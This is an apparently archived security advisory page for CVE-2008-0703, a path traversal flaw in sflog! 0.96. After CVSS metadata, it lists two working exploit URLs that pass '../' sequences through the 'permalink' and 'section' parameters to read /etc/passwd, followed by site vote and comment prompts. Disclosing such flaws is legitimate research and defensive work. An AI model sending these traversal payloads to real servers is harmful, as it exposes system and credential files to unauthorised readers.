sflog! 0.96 remote file disclosure vulnerabilities

2008.02.12

Credit: muuratsalo

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-0703

CWE: CWE-22

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

sflog! 0.96 remote file disclosure vulnerabilities

download   http://sourceforge.net/projects/sflog/

author     muuratsalo
contact   muuratsalo[at]gmail.com

exploits
http://localhost/sflog/?blog=test&permalink=../../../../../../../../../.
./etc/passwd
http://localhost/sflog/index.php?blog=test&section=../../../../../../../
../../../etc/passwd

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

sflog! 0.96 remote file disclosure vulnerabilities

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

sflog! 0.96 remote file disclosure vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.